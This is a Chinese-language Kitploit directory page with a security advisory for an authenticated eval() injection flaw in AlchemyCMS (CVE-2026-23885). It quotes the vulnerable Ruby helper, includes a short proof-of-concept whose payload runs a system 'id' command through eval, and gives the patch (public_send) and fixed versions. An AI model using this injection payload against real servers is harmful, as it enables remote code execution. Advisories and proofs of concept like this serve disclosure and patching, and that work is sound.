Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/thedeepopc/cve-2026-23885
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubthedeepopc/cve-2026-23885

CVE-2026-23885

# CVE-2026-23885 的概念验证漏洞利用程序 针对 AlchemyCMS 中通过 eval() 注入实现认证远程代码执行(RCE)漏洞的概念验证利用程序,包含技术分析与修复指导。

查看仓库
167个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

安全公告:CVE-2026-23885

AlchemyCMS 中的已认证远程代码执行(RCE)漏洞

1. 执行摘要

在 AlchemyCMS 框架中发现了一个涉及**动态求值代码中指令的不当中和(CWE-95)**的严重安全漏洞。该漏洞允许具有管理员权限的已认证用户通过 eval() 注入点,在主机服务器上执行任意 Ruby 代码和系统命令。


2. 技术漏洞分析

受影响组件

  • 文件: app/helpers/alchemy/resources_helper.rb
  • 方法: Alchemy::ResourcesHelper#resource_url_proxy
  • 风险等级: 中/高(已认证 RCE)

根本原因

该辅助方法不安全地处理了 resource_handler 对象中的 engine_name 属性。该属性未经任何清理或验证,被直接传入 Ruby 的 eval() 函数。

root@kitploit:~
def resource_url_proxy(resource_handler)
  if resource_handler.in_engine?
    eval(resource_handler.engine_name) # rubocop:disable Security/Eval
  else
    main_app
  end
end

# rubocop:disable Security/Eval 指令的存在证实了使用 eval() 的安全影响已被识别,但在实现过程中被绕过。

3. 概念验证(PoC)

攻击向量

该漏洞在 AlchemyCMS 管理界面渲染基于资源的视图(例如站点或语言)时被触发。如果攻击者能够操纵模块配置或底层资源数据,即可实现代码执行。

独立利用脚本

以下脚本通过模拟易受攻击的辅助方法环境,演示了任意代码执行:

Ruby

root@kitploit:~
require 'ostruct'

def resource_url_proxy(resource_handler)
  if resource_handler.engine_name && !resource_handler.engine_name.empty?
    eval(resource_handler.engine_name)
  end
end

# 载荷:执行系统 'id' 命令并创建证据文件
payload = "system('id > /tmp/rce_verified'); 'main_app'"
handler = OpenStruct.new(engine_name: payload)

resource_url_proxy(handler)

执行证据

执行后,系统命令被处理,攻击者即可获得对服务器环境的访问权限。

RCE 终端证明

4. 影响与严重性

  • 机密性: 高。可完全访问应用程序数据和环境机密。
  • 完整性: 高。能够修改文件和数据库记录。
  • 可用性: 高。可能导致系统完全瘫痪。
  • CVE ID: CVE-2026-23885

5. 修复方案

该漏洞已在以下修补版本中得到解决:

  • 7.4.12
  • 8.0.3

修复措施包括将 eval() 调用替换为 public_send(),以安全地将请求路由到预期的引擎代理:

Ruby

root@kitploit:~
main_app.public_send(resource_handler.engine_name) if resource_handler.engine_name.present?
漏洞发现:独立安全审计

CVE 参考:CVE-2026-23885

  • CVE 列表: CVE.org 上的 CVE-2026-23885
  • 漏洞分析: Tenable CVE-2026-23885 数据库
  • AlchemyCMS 安全策略: 安全指南
下载工具